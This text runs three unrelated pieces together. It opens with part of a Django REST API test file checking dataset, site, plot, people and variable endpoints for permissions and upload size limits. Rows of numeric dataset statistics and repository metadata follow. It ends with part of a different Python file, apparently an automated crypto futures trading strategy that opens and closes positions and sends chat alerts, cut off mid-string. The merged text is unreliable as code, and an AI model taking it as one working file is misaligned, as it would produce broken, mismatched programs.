data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
def test_issue_74(self):
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
dataset_url = json.loads(response.content.decode('utf-8'))["url"]
response = self.client.get(dataset_url)
self.assertContains(response,
"http://testserver/api/v1/variables/1/")
self.assertContains(response,
"http://testserver/api/v1/sites/1/")
self.assertContains(response,
"http://testserver/api/v1/plots/1/")
def test_issue_180(self):
"""
Dataset lost due to permissions error
:return:
"""
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"],'
'"access_level":1 }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
dataset_url = json.loads(response.content.decode('utf-8'))["url"]
response = self.client.get(dataset_url)
self.assertContains(response,
"http://testserver/api/v1/variables/1/")
self.assertContains(response,
"http://testserver/api/v1/sites/1/")
self.assertContains(response,
"http://testserver/api/v1/plots/1/")
@mock.patch('django.core.files.uploadedfile.InMemoryUploadedFile.size', new_callable=PropertyMock)
def test_issue_117(self, mock_file_size):
"""Is the backend enforcing a file size limit? Testing limits for admin and regular users"""
mock_file_size.return_value = 2147483648
self.login_user("auser")
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":false',
status_code=status.HTTP_400_BAD_REQUEST)
self.assertContains(response,"Uploaded file size is 2048.0 MB. Max upload size is 1024.0 MB",
status_code=status.HTTP_400_BAD_REQUEST)
mock_file_size.return_value = 3147483648
self.login_user("admin")
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":false',
status_code=status.HTTP_400_BAD_REQUEST)
self.assertContains(response, "Uploaded file size is 3001.7 MB. Max upload size is 2048.0 MB",
status_code=status.HTTP_400_BAD_REQUEST)
def test_issue_253(self):
"""Error uploading files > 2.5 MB #253"""
self.login_user("auser")
# Write a 3 MB file
with open('{}/bigfile.dat'.format(dirname(__file__)), 'wb') as out:
out.seek((1024 * 1024 * 3) - 1)
out.write(b"0")
with open('{}/bigfile.dat'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
self.assertContains(response, "uploaded",
status_code=status.HTTP_201_CREATED)
response = self.client.get( '/api/v1/datasets/1/archive/')
self.assertContains(response, '')
self.assertTrue("Content-length" in response)
self.assertEquals(response["Content-length"], '3145728')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=bigfile_" in
response['Content-Disposition'])
try:
os.remove('{}/bigfile.dat'.format(dirname(__file__)))
except:
pass
class SiteClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
user = User.objects.get(username="auser")
self.client.force_login(user)
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/sites/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/sites/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/sites/1/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/sites/1/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/sites/1/", "site_id": "CC-CCPD",
"name": "Central City CCPD",
"description": "Et doming epicurei posidonium has, an sit sanctus intellegebat. Ne malis reprehendunt mea. Iisque dolorem vel cu. Ut nam sapientem appellantur definitiones, copiosae placerat inimicus per ei. Cu pro reque putant, cu perfecto urbanitas posidonium eum, pri probo laoreet cu. Ei duo cetero concludaturque, ei adhuc facilis sit.\r\n\r\nAn aeque harum ius, mea ut erant verear salutandi. Eligendi recusabo usu ad. Ad modo vero consequat his, ne aperiam alienum suscipiantur his. Altera laoreet petentium pro ut. His option vocibus at. Vix no semper omnesque maluisset, accusata qualisque ut pro. Eos sint constituto temporibus in.",
"country": "United States", "state_province": "", "utc_offset": -9,
"location_latitude": -8.983987234, "location_longitude": 5.9832932847,
"location_elevation": "100-400", "location_map_url": "",
"location_bounding_box_ul_latitude": None,
"location_bounding_box_ul_longitude": None, "location_bounding_box_lr_latitude": None,
"location_bounding_box_lr_longitude": None, "site_urls": "http://centralcityccpd.baz",
"submission_date": "2016-10-01", "contacts": [], "pis": [],
"submission": "http://testserver/api/v1/people/3/"})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/sites/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/sites/2/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
class PlotClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
self.login_user("auser")
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/plots/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/plots/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/sites/1/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/plots/1/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/plots/1/", "plot_id": "CC-CCPD1",
"name": "Central City CCPD Plot 1",
"description": "Sed ut perspiciatis, unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam eaque ipsa, quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt, explicabo. Nemo enim ipsam voluptatem, quia voluptas sit, aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos, qui ratione voluptatem sequi nesciunt, neque porro quisquam est, qui dolorem ipsum, quia dolor sit amet, consectetur, adipisci[ng] velit, sed quia non numquam [do] eius modi tempora inci[di]dunt, ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit, qui in ea voluptate velit esse, quam nihil molestiae consequatur, vel illum, qui dolorem eum fugiat, quo voluptas nulla pariatur",
"size": "", "location_elevation": "", "location_kmz_url": "", "submission_date": "2016-10-08",
"pi": "http://testserver/api/v1/people/3/",
"site": "http://testserver/api/v1/sites/1/",
"submission": "http://testserver/api/v1/people/4/"})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/plots/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/plots/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
class ContactClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
self.login_user("auser")
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/people/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/people/?format=api')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/people/2/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/people/2/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/people/2/", "first_name": "Luke",
"last_name": "Cage", "email": "lcage@foobar.baz", "institution_affiliation": "POWER", "orcid": ""})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/people/',
data='{"first_name":"Killer","last_name":"Frost","email":"kfrost@earth2.baz","institution_affiliation":"ZOOM"}',
content_type='application/json')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/people/7/", "first_name": "Killer", "last_name": "Frost",
"email": "kfrost@earth2.baz", "institution_affiliation": "ZOOM", "orcid": ""})
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/people/2/',
data='{"url": "http://testserver/api/v1/people/2/", "first_name": "Luke", "last_name": "Cage", "email": "lcage@foobar.baz", "institution_affiliation": "POW"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
class VariableClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
user = User.objects.get(username="auser")
self.client.force_login(user)
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/variables/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/variables/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/variables/2/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/variables/2/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/variables/2/", "name": "Ice"})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/variables/',
data='{"name":"Val}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/variables/2/',
data='", "{"name":"Val}"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
| 55.769754
| 932
| 0.554059
| 6,824
| 65,641
| 5.201348
| 0.088658
| 0.029442
| 0.05832
| 0.054601
| 0.814166
| 0.789063
| 0.763284
| 0.741618
| 0.727531
| 0.710092
| 0
| 0.025511
| 0.288174
| 65,641
| 1,176
| 933
| 55.817177
| 0.734125
| 0.063101
| 0
| 0.703789
| 0
| 0.009185
| 0.319049
| 0.066217
| 0
| 0
| 0
| 0
| 0.291619
| 1
| 0.06085
| false
| 0.001148
| 0.019518
| 0.001148
| 0.096441
| 0.001148
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0cedfacc5254e74a4ed12c03e80b96a0c1ac5f96
| 118
|
py
|
Python
|
littlebird/__init__.py
|
aryamccarthy/littlebird
|
7f2b622a6669f53dbec836862c9dd0de59046359
|
[
"MIT"
] | null | null | null |
littlebird/__init__.py
|
aryamccarthy/littlebird
|
7f2b622a6669f53dbec836862c9dd0de59046359
|
[
"MIT"
] | null | null | null |
littlebird/__init__.py
|
aryamccarthy/littlebird
|
7f2b622a6669f53dbec836862c9dd0de59046359
|
[
"MIT"
] | null | null | null |
from .tweet_utils import TweetReader
from .tweet_utils import TweetWriter
from .tweet_tokenizer import TweetTokenizer
| 29.5
| 43
| 0.872881
| 15
| 118
| 6.666667
| 0.533333
| 0.27
| 0.28
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 118
| 3
| 44
| 39.333333
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0b76365a67b37869a488d54b19cb3e82aafb5122
| 74
|
py
|
Python
|
sample-apps/imports-app/src/routes/__init__.py
|
fakepop/hubspot-api-python
|
f04103a09f93f5c26c99991b25fa76801074f3d3
|
[
"Apache-2.0"
] | 1
|
2020-11-12T08:46:32.000Z
|
2020-11-12T08:46:32.000Z
|
sample-apps/imports-app/src/routes/__init__.py
|
fakepop/hubspot-api-python
|
f04103a09f93f5c26c99991b25fa76801074f3d3
|
[
"Apache-2.0"
] | null | null | null |
sample-apps/imports-app/src/routes/__init__.py
|
fakepop/hubspot-api-python
|
f04103a09f93f5c26c99991b25fa76801074f3d3
|
[
"Apache-2.0"
] | null | null | null |
from .oauth import module as oauth
from .imports import module as imports
| 24.666667
| 38
| 0.810811
| 12
| 74
| 5
| 0.5
| 0.4
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 74
| 2
| 39
| 37
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ba77b63e7a1ec2bc3e9bbef7845512a760fbe06
| 32,844
|
py
|
Python
|
strategies/LineWith.py
|
mn3711698/singlecoin
|
63f0154ba17c7a21295b2ff6ef94929cf708a47c
|
[
"MIT"
] | 33
|
2021-05-14T03:21:53.000Z
|
2021-11-07T20:27:53.000Z
|
strategies/LineWith.py
|
mn3711698/singlecoin
|
63f0154ba17c7a21295b2ff6ef94929cf708a47c
|
[
"MIT"
] | 2
|
2021-06-04T15:31:01.000Z
|
2021-09-25T12:24:02.000Z
|
strategies/LineWith.py
|
mn3711698/singlecoin
|
63f0154ba17c7a21295b2ff6ef94929cf708a47c
|
[
"MIT"
] | 14
|
2021-05-14T03:34:30.000Z
|
2021-11-10T12:35:39.000Z
|
# -*- coding: utf-8 -*-
##############################################################################
# Author:QQ173782910
##############################################################################
from datetime import datetime
from strategies import Base
from getaway.send_msg import dingding, wx_send_msg
class LineWith(Base):
def on_pos_data(self, pos_dict):
# 先判断是否有仓位,如果是多头的仓位, 然后检查下是多头还是空头,设置相应的止损的价格..
current_pos = float(pos_dict['positionAmt'])
self.unRealizedProfit = float(pos_dict['unRealizedProfit'])
entryPrice = float(pos_dict['entryPrice'])
if self.enter_price == 0 or self.enter_price != entryPrice:
self.enter_price = entryPrice
if current_pos > 0:
self.stoploss_price = entryPrice * (1 - self.long_stoploss)
self.takeprofit_price = entryPrice * (1 + self.long_takeprofit)
elif current_pos < 0:
self.stoploss_price = entryPrice * (1 + self.short_stoploss)
self.takeprofit_price = entryPrice * (1 - self.short_takeprofit)
if self.pos != 0:
if self.unRealizedProfit > 0:
self.maxunRealizedProfit = max(self.maxunRealizedProfit, self.unRealizedProfit)
elif self.unRealizedProfit < 0:
self.lowProfit = min(self.lowProfit, self.unRealizedProfit)
if self.pos != current_pos: # 检查仓位是否是一一样的.
if current_pos == 0:
dingding(f"仓位检查:{self.symbol},交易所帐户仓位为0,无持仓,系统仓位为:{self.pos},重置为0", symbols=self.symbol)
self.pos = 0
self.sync_data()
return
elif current_pos != 0:
if self.HYJ_jd_ss != 0:
self.HYJ_jd_ss = 0
dingding(f"仓位检查:{self.symbol},交易所帐户仓位为:{current_pos},有持仓,系统仓位为:{self.pos},重置为:{current_pos}", symbols=self.symbol)
self.pos = current_pos
self.sync_data()
return
if current_pos == 0 and len(self.open_orders) == 0:
coraup = self.cora_wave > self.old_cora_wave
Cora_Raw_wave = self.cora_raw - self.cora_wave
if coraup: # 多单方向
raw_wave = abs(Cora_Raw_wave) > self.long_line_poor
else: # 空单方向
raw_wave = abs(Cora_Raw_wave) > self.short_line_poor
if self.pos_flag == 1 and coraup and raw_wave: # 开多未成交,取消未成交订单再下单
self.pos_flag = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.ask
res_buy = self.buy(enter_price, abs(self.pos), mark=True)
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 - self.long_stoploss)
self.takeprofit_price = enter_price * (1 + self.long_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开多2"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开多2,交易所返回:{res_buy}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.pos_flag == -1 and not coraup and raw_wave: # 开空未成交,取消未成交订单再下单
self.pos_flag = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.bid
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.pos = -self.pos
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 + self.short_stoploss)
self.takeprofit_price = enter_price * (1 - self.short_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开空2"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开空2,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
else:
self.pos_flag = 0
def on_ticker_data(self, ticker):
self.ticker_data(ticker)
def ticker_data(self, ticker):
if self.symbol == ticker['symbol']:
last_price = float(ticker['last_price']) # 最新的价格.
self.last_price = last_price
if self.pos != 0:
if self.high_price > 0:
self.high_price = max(self.high_price, self.last_price)
if self.low_price > 0:
self.low_price = min(self.low_price, self.last_price)
if self.pos == 0: # 无持仓
if self.HYJ_jd_ss == 1: # 策略计算出来是开多信号
self.HYJ_jd_ss = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.ask
res_buy = self.buy(enter_price, abs(self.pos), mark=True)
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 - self.long_stoploss)
self.takeprofit_price = enter_price * (1 + self.long_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开多"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开多交易所返回:{res_buy}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == -1: # 策略计算出来是开空信号
self.HYJ_jd_ss = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.bid
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.pos = -self.pos
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 + self.short_stoploss)
self.takeprofit_price = enter_price * (1 - self.short_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开空"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开空交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == 2: # 趋势反转后平空后开多
self.HYJ_jd_ss = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.ask
res_buy = self.buy(enter_price, abs(self.pos), mark=True)
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 - self.long_stoploss)
self.takeprofit_price = enter_price * (1 + self.long_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开多3"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开多交易所返回:{res_buy}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == -2: # 趋势反转后平多后开空
self.HYJ_jd_ss = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.bid
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.pos = -self.pos
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 + self.short_stoploss)
self.takeprofit_price = enter_price * (1 - self.short_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开空3"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开空交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.pos > 0: # 多单持仓,目前止损是以 HYJ_jd_ss = 11,如有需要其他的止损请在下边增加自己的代码
enter_price = self.bid2 # +1
Profit = self.round_to((enter_price - self.enter_price) * abs(self.pos), self.min_price)
if self.HYJ_jd_ss == 11: # self.HYJ_jd_ss = 11 是趋势反转了
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
self.stop_price = 0
HYJ_jd_first = "趋势反转平多:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "平多"
HYJ_jd_curAmount = "%s" % enter_price
HYJ_jd_remark = "趋势反转平多:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势反转平多,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == 22: # self.HYJ_jd_ss = 22 是趋势收缩了
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
self.stop_price = 0
HYJ_jd_first = "趋势收缩平多:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "平多"
HYJ_jd_curAmount = "%s" % enter_price
HYJ_jd_remark = "趋势收缩平多:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势收缩平多,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.last_price < self.stoploss_price:
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
self.times += 1 # 这个是连续亏损计数
self.stop_price = 0
HYJ_jd_first = "止损平多:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "止损平多"
HYJ_jd_curAmount = "%s" % enter_price
HYJ_jd_remark = "止损平多:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"止损平多,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.takeprofit_price != 0 and self.last_price > self.takeprofit_price:
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
HYJ_jd_first = "止盈A:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.times = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.stop_price = 0
HYJ_jd_tradeType = "平多"
HYJ_jd_curAmount = "%s" % enter_price
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"多单,止盈A,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
# elif self.unRealizedProfit > 0.1 and self.high_price - self.last_price > 1:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈B:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈B,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.unRealizedProfit > 0.05 and self.high_price - self.last_price > 1:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈C:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
